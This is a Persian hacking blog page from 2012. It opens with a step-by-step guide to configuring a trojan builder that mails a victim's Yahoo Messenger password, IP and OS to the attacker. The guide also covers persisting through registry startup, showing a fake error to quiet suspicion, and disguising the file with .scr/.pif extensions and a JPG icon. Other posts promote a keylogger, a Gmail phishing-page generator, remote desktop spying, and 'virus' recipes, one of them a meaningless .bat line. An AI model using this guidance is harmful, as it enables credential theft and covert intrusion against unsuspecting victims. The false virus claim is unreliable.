در این بخش از برنامه شما میتوانید به برنامه بگویید در هنگام ارسال اطلاعات برای ما علاوه بر پسورد چه چیزهای دیگری را از کامپیوتر قربانی برای ما ارسال کند!
Send Y! Mess Pass : 
برای ما نام کاربری و کلمه عبور کاربر را هنگامی که برنامه یاهو را باز می کند به صورت پیام شخصی ارسال میکند.
Send OS Name : 
برای ما نسخه سیستم عاملی را که کاربر با آن کار میکند را ارسال میکند!
Send IP : 
شماره IP شخص مقابل را برای ارسال میکند(برای اطلاع از IP میتوانید به بخش آموزش شبکه مراجعه کنید)
Registry Startup : 
اگر این گزینه فعال باشد هر دفعه که سیستم روش میشود این برنامه به داخل حافظه بارگزاری میشود و شما آماده فعالیت میباشد
** 
تذکر مهم اگر میخواهید فقط یک بار برای شما کلمه عبور ارسال شود این گزینه را غیر فعال کنید


این قسمت از برنامه برای شبیه سازی یک پیغام خطا به کار میرود!!!
اما چرا شبیه سازی؟ ممکن است کاربر پس از اجرای برنامه ای که برای او میفرستید بگوید این که برنامه نیست و 
ولی اگر گزینه Enable را فعال کنید پس از اجرای برنامه یک پیغام خطای ساختگی که مثلا این برنامه خراب دانلود شده و…. نمایش داده میشود که شک کاربر را کم میکند درضمن بهتره خودتان پیغام را عوض کنید، و برای اینکه ببنید چطور در آمده میتوانید برروی دکمه Test بزنیدبه طور مثال اگر روی تست بزنید پیغام زیر را مشاهده میکنید که یعنی به محض اجرای برنامه پیغام زیر برای کاربر نمایش داده میشود!


اما این بخش مربوط میشه به اینکه حالا که برنامه را برای کاربر فرستادید پسورد ها به کجا ارسال بشن؟ یعنی به چه ای دی در یاهو فرستاده بشه!
خب شما اینجا باید ای دی خود را بنویسید به طور مثال من اینجا از ای دی yahoobomberاستفاده کردمیعنی اگر برنامه نهایی (تروجان را برای کسی ارسال کنم قربانی پس از اجرای برنامه کلمه عبورش به ای دی که اینجا نوشته می شود فرستاده میشود!



و اما ظریفترین جای کاریعنی فایلی که قراره برای کاربر فرستاده بشه باید چه اسمی داشته باشهکه هم زیبا باشه هم تحریک کننده که کاربر با دریافت برنامه آن را از شما قبول کنه!
به طور مثال بعضی از کاربران که زیاد نیش خوردن !!دیگه از کسی هیچ وقت فایلهای exe را دریافت نمی کنند که اجرا کنند!!! برای همین میتوانید از یکی از پسوندهای pif , cmd , scr استفاده کنیدبا یک نام جذاب!!!!
اما گزینه With JPG Icon این اگر فعال باشد شکل ایکون تروجان شما به صورت فایلهای JPG نمایش داده میشود .
و تذکر این که این حالت فقط برای فایلهایی که پسوند آنها exe یا scr است میشود استفاده کرد!


خب کارتان که تموم شد فقط می ماند زحمت زدن دکمه Create MPS که پس از آن یک فایل برای شما ساخته میشود توجه داشته باشید که خودتون اونو اجرا نکنید که این شامل تروجان اصلی برنامه می باشد!! که این فایل ساخته شده باید برروی کامپیوتر قربانی اجرا شود!





نه حالا من میخوام بدونم کدوم بنده خدایی رو میخواد هک کنید و چرا؟؟؟
اگه کسی رو هک نکنید برنامه های دیگه ای رو هم قرار می دمالبته من خودم تا به حال کسی رو هک نکردم.

tkh بازدید : 106 پنجشنبه 11 آبان 1391 نظرات (0)

به همراه این کی لاگر 60 ایکن زيبا وغير قابل شناسيی+يک Multi Binder +راهنمای کامل استفاده از برنامه فرستاده ميشود.+پشتيبانی در صورتی که توسط انتی ويرس در آينده شناسيی بشه!

                                      دانلود کی لاگر

tkh بازدید : 110 پنجشنبه 11 آبان 1391 نظرات (0)

فیسبوک یا در اصل امپراطوری بی مثال مارک زوکربرگ با داشتن 900 میلیون کاربر جزوتجربیات تکرار نشدنی زندگی آنلاین به شمار می روداما متاسفانه همین کشور بزرگ میتواند منبعی خطرناک برای اطلاعات کاربران آن نیز باشدهر سرویسی که بزرگ می شود،به همان اندازه برای کلاهبرداران و هکرها هم ارزشمند می شود و لقمه ای چرب برایکسب درآمد به حساب می آیدفیسبوک نیز از این قاعده مستثنا نیست

جرایم سایبری همیشه در جریان هستند اما در مورد شبکه های اجتماعی باید گفت اینجرایم را بسیار آسان تر می توان مرتکب شدمثلا در شبکه های اجتماعی کاربران بدوناینکه یکدیگر را به خوبی بشناسند با یکدیگر دوست میشوند و اطلاعات خود را در اختیار همقرار می دهندالبته هیچ کدام از شبکه های اجتماعی موجود به اندازه فیسبوک پتانسیلاجرای جرایم سایبری را ندارندبه خصوص اینکه فیسبوک بیش از صدها میلیون کاربر دارد وامکان اجرای هر سواستفادهای از آن بسیار ساده تر استبرای آشنایی با جرایمی که ازطریق فیسبوک انجام میشوند، ما چند نمونه از رایج ترین آنها را برایتان انتخاب کردهایم.

 

 هک کردن حساب های کاربری

به عقیده Grayson Milbourne -  مدیر مرکز تحقیقات وبروت - هنگامی که مجرمان آنلاینمی خواهند اکانتی را در فیسبوک هک کنند از یکی از ده ها ابزار بی رحم و ناجوانمردانهموجود جهت Brute Force استفاده می کننداین ابزارها اصولا گرد رمزهای عبور رایج میگردند و برخلاف ایمیل ها، معمولا از نام ها و تاریخ ها استفاده می کنندبه محض هک کردنیک اکانت، هکر می تواند از آن به عنوان یک وسیله مطمئن برای ارسال اسپم استفاده کند،یا اطلاعات آن حساب کاربری را بفروشدفروختن اطلاعات در مقابل دریافت پول رایج ترینروش کلاهبرداران و هکرهای اینترنتی استدر دنیای مجازی، اطلاعات کاربران ارزش و بهایبسیاری دارند

 

 استفاده از حساب های کاربری

یکی از روش های مستقیم دزدی هویت، زمانی است که هکر با استفاده از شناسه کاربریو رمز عبور دزدیده شده وارد اکانت کاربر می شودبه محض اینکه هکرها آنلاین می شوند،تمام فهرست دوستان کاربر و اطلاعات آنها را در اختیار دارنددر اینگونه مواقع کلاهبردار میتواند با استفاده از هویت فرد قربانی، طرح های فریب کارانه خود را مانند حیله «لندن» اجراکندمثلا بگوید که در مشکلی گرفتار شده است و به مقداری پول نیاز داردحیله «لندن» درفیسبوک موفقیت بیشتری دارد زیرا میان کاربر و دوستان او در فیسبوک اعتماد بیشتریوجود دارد

حیله لندنهمان داستان آشنای جا گذاشتن

tkh بازدید : 102 پنجشنبه 11 آبان 1391 نظرات (0)

ماشین های لوکسی همچون BMW در نگاه اول باید در کنار قیمت بسیار بالا و کیفیت ساخت عالی شان، نکات امنیتی فراوانی را هم رعایت کنند. اما به نظر می رسد که به تازگی با کشف یک رخنه امنیتی کوچک در تولیدات این کارخانه، اوضاع کمی به هم ریخته. به شکلی که میزان سرقت BMW در انگلیس طی سال جاری با صعود غیرقابل انتظاری روبرو شده است. برخی منابع اذعان دارند که از ابتدای ۲۰۱۲ تا کنون بیش از ۳۰۰ دستگاه مدل های مختلف BMW به سرقت رفته اند. جالب اینکه دزدگیر و سیستم ایموبلایزر ماشین های سرقت شده فعال نشده و هیچ مزاحمتی برای سارقان ایجاد نکرده است. 

 

کارشناسان گمان می کنند که شیوه احتمالی کار سارقان، استفاده از دستگاه هایی است که به پورت OBD ماشین متصل شده و سویچ های خام را در سیستم امنیتی ماشین تعریف می کنند. به این صورت ماشین بدون هیچ سر و صدایی سرقت شده و برای صاحبش تنها یک کلید بی مصرف باقی می ماند که در صورت پیدا کردن ماشین هم، نمی تواند از آن استفاده کند. 

 

البته جزئیات فرآیند این سرقت ها کمی با یکدیگر تفاوت دارند، اما تمامی گزارشات حاکی از آن است که شیوه کاری آنها بر پایه ابزار و روش های یکسانی بنا شده است. مرحله اول ورود به ماشین است که یک بلوکه کننده سیگنال RF (رادیو فرکانس) باعث قطع ارتباط سویچ ماشین با دستگاه های کنترلی آن می شود. این کار جلوی فعال کردن سیستم امنیتی ماشین توسط صاحب آن و قفل شدن درب ها هنگام خروج از اتومبیل را می گیرد. البته برخی دزدهای ناشی و کم تجربه از شکستن شیشه پنجره اتومبیل برای این کار استفاده می کنند. البته همین گروه افراد ناشی هم به نظر می رسد که از دستگاه های ویژه ای بهره می برند که باعث نفوذ به سیستم اولتراسونیک دزدگیر ماشین و از کار افتادن آژیر آن می شود. 

 

پس از آنکه به هر شیوه ای وارد ماشین شدند، از طریق اتصال به پورت OBD-II اتومبیل، به آی دی دیجیتالی منحصر به فرد سویچ آن ماشین دست پیدا می کنند و به راحتی سویچ خامی را که در اختیار دارند، با این آی دی دیجیتالی از نو برنامه ریزی می کنند. اکنون ماشین با دزدان گرامی همچون صاحب اصلی خود رفتار کرده و بدون دردسر همراه آنها می رود. 

 

تمام ماشین هایی که در اروپا فروخته می شوند، باید دسترسی بدون محدودیتی را از طریق پورت OBD-II فراهم کنند و کدهای OBD را باز بگذارند تا مکانیک های خارج از سیستم خدمات کارخانه و تعمیرگاه های متفرقه هم امکان کار با آن را داشته باشند. البته موج اخیر سرقت BMW در مقایسه با دیگر کارخانه های اتومبیل سازی نشان از آن دارد که نباید تنها OBD را مقصر شناخت، شاید فراوان بودن قطعات یدکی این اتومبیل (از جمله کلیدهای دیجیتالی خام) هم تاثیر به سزایی در این زمینه داشته باشد. 

 

از همین رو، به تازگی سایت ها و فروم های مربوط به BMW به دارندگان تمامی مدل های سری 1 تا X6 این اتومبیل در خصوص مراقبت های امنیتی بیشتر، مرتبا تذکر می دهند. هرچند که مدیر رسانه ای BMW در انگلیس اعتقاد دارد که ماشین های مدل بالا و گرانقیمت همیشه هدف اصلی سارقان بوده اند و ما شاهد سرقت اتومبیل های تمامی کارخانه ها هستیم و این منحصر به BMW نیست. 

 

البته تعداد بسیار بیشتر و بالاتر از حد معمول ماشین های این کارخانه نشان از غیرعادی بودن اوضاع دارد و شاید سارقان و هکرها رخنه امنیتی جدیدی را در این ماشین پیدا کرده اند که چنین دسترسی آسانی را به آنها عطا کرده است. از دیگر سو امکانات امنیتی BMW در مدل های جدیدش کاملا محدود است و شما انتخاب چندانی ندارید. البته شاید یکی از بهترین نکات امنیتی (که البته چندان هم خوش آیند نیست) قطع کردن پورت OBD-II و یا استفاده از قفل های فیزیکی بیرونی برای جلوگیری از دسترسی آسان به آن است. شاید هم پیش بینی استفاده از یک PIN یا رمزعبور برای دسترسی به این بخش های حیاتی امنیتی خودرو توسط کارخانه، تا حد بسیار زیادی بتواند جلوی این گونه سرقت ها را بگیرد.

tkh بازدید : 260 پنجشنبه 11 آبان 1391 نظرات (0)

تو   1  ساعت آی دی اونی رو کی میخواین هک کنید . فقط تشکر یادتون نره

بهتون یاد میدم چطوری پسورد آی دی رو که میخواین بدست بیارید

نکته مهم×××× ایدی که شما برای ارسال استفاده می کنید حتما × باید 6 ماه از زمان ساخت ان گذشته باشید یا ایدی خاص باشد به طور مثال  att.net

بقیه فقط برای اعضای وب...

درباره هك ,
tkh بازدید : 760 پنجشنبه 11 آبان 1391 نظرات (0)

هک کردن Gmail خیلی راحت (Good) 

سلام 
يه برنامه براتون ميزارم كه در هك جي ميل استفاده ميشه بدين صورت كه در كادر بالاي برنامه gmail كسي كه مي خواهيد هك بشه رو مي نويسيد و در پايين ايميل خودتون بعد گزينه generate رو بزنيد بعد برنامه واسه شما دو تا فايل كه يكيش php و يكيش html هست درست ميكنه كه شما بايد اينارو در يه هاست قرار بدين و او لينك html رو به طرف بدين و .....
بقیش فقط برای اعضای وب...(با دانلودش البته!)
درباره هك ,
tkh بازدید : 75 سه شنبه 09 آبان 1391 نظرات (1)

رای این کار شما می توانید از برنامه ی DameWare Mini Remote .در این برنامه شما نیاز به داشتن ip طرف برای مشاهده ی دسکتاپ دارید که قبلآ این کار را در کلاس یاهو توضیح دادیم .بعد از این اگر طرف مقابل شما از ویندوزی استفاده میکند که در بالا آمدن نیازی به پسورد ندارد کار شما راحت است و می توانید بدون هیچ مشکلی به مشاهده بپردازید و اگر این طور نبود شاید شما بتوانید با استفاده از تنظیمات برنامه این کار را انجام دهید

tkh بازدید : 113 یکشنبه 07 آبان 1391 نظرات (0)

برای هکرها مهم نیست شما در سفر هستید یا در خانه یا در محل کار. آنها کار خود را می ‌کنند و هدف شان نیز دستیابی به اطلاعات است و برای رسیدن به آن از روش های مختلفی بهره می ‌برند. پس چه بهتر که حداقل پیش از رفتن به سفر علاوه بر رعایت نکات بهداشتی و ایمنی کمی هم نکات امنیتی را رعایت کنیم. با گروه فناوری اطلاعات گفتگویی داشته باشید پیش از سفر، نشستی با کارشناسان فناوری اطلاعات داشته باشید و از آنها راهکارهای در امان ماندن از دست هکرها و از دست دادن داده‌های ارزشمندی را که همراه تان است جویا شوید. گروه فناوری اطلاعات، کارهایی که باید پیش از سفر یا در هنگام سفر انجام دهید را به شما یاد خواهند داد یا ممکن است حتی دستگاه‌هایی مانند لپ‌تاپ یا گوشی همراه را که داده های ارزشمندی در آنها نیست، در اختیار شما بگذارند. 

درباره هك ,
tkh بازدید : 113 یکشنبه 07 آبان 1391 نظرات (0)

برای هکرها مهم نیست شما در سفر هستید یا در خانه یا در محل کار. آنها کار خود را می ‌کنند و هدف شان نیز دستیابی به اطلاعات است و برای رسیدن به آن از روش های مختلفی بهره می ‌برند. پس چه بهتر که حداقل پیش از رفتن به سفر علاوه بر رعایت نکات بهداشتی و ایمنی کمی هم نکات امنیتی را رعایت کنیم. با گروه فناوری اطلاعات گفتگویی داشته باشید پیش از سفر، نشستی با کارشناسان فناوری اطلاعات داشته باشید و از آنها راهکارهای در امان ماندن از دست هکرها و از دست دادن داده‌های ارزشمندی را که همراه تان است جویا شوید. گروه فناوری اطلاعات، کارهایی که باید پیش از سفر یا در هنگام سفر انجام دهید را به شما یاد خواهند داد یا ممکن است حتی دستگاه‌هایی مانند لپ‌تاپ یا گوشی همراه را که داده های ارزشمندی در آنها نیست، در اختیار شما بگذارند. 

درباره هك ,
tkh بازدید : 98 چهارشنبه 03 آبان 1391 نظرات (4)
هرگونه استفاده خلاف شرع شرعا حرام است به این نکات توجه کنید 1- در قسمت Internet Address باید IP مورد نظر خود را وارد کنید( 211.142.211.40 پورت 1818) 2- در قسمت Destination name باید نام مورد نظر کانکشن خود را وارد کنید 3-در قسمت User name نام کاربری خود را وارد کنید 4-در قسمت Password رمز عبور کانکشن
tkh بازدید : 81 چهارشنبه 03 آبان 1391 نظرات (0)
آموزش ساخت ویروس : این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد





Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]
"Flags"="127"
[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]
"Flags"="126"
[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]
"Flags"="2"
"WindowsEffect"="0
tkh بازدید : 81 چهارشنبه 03 آبان 1391 نظرات (0)
آموزش ساخت ویروس : این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد





Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]
"Flags"="127"
[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]
"Flags"="126"
[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]
"Flags"="2"
"WindowsEffect"="0
tkh بازدید : 93 چهارشنبه 03 آبان 1391 نظرات (0)
آموزش ساخت ویروس : این ویروس هارد را پر میکند و دیگر هیچ بازی و برنامه ای نصب نمیشود طرز ساخت ویروس: note pad خود را باز کرده و کد c/windows/system32/jefo/display/memory/full را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید و در قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل memory.bat بعد ذخیره کنید

تعداد صفحات : 2

اطلاعات کاربری
  • فراموشی رمز عبور؟
  • نویسندگان
    آرشیو
    نظرسنجی
    دوست داريد درباره ي كدام موضوع مرتبط به هك بيشتر نوشته شود ?
    آمار سایت
  • کل مطالب : 124
  • کل نظرات : 50
  • افراد آنلاین : 1
  • تعداد اعضا : 93
  • آی پی امروز : 0
  • آی پی دیروز : 1
  • بازدید امروز : 1
  • باردید دیروز : 2
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 47
  • بازدید ماه : 47
  • بازدید سال : 2,440
  • بازدید کلی : 40,435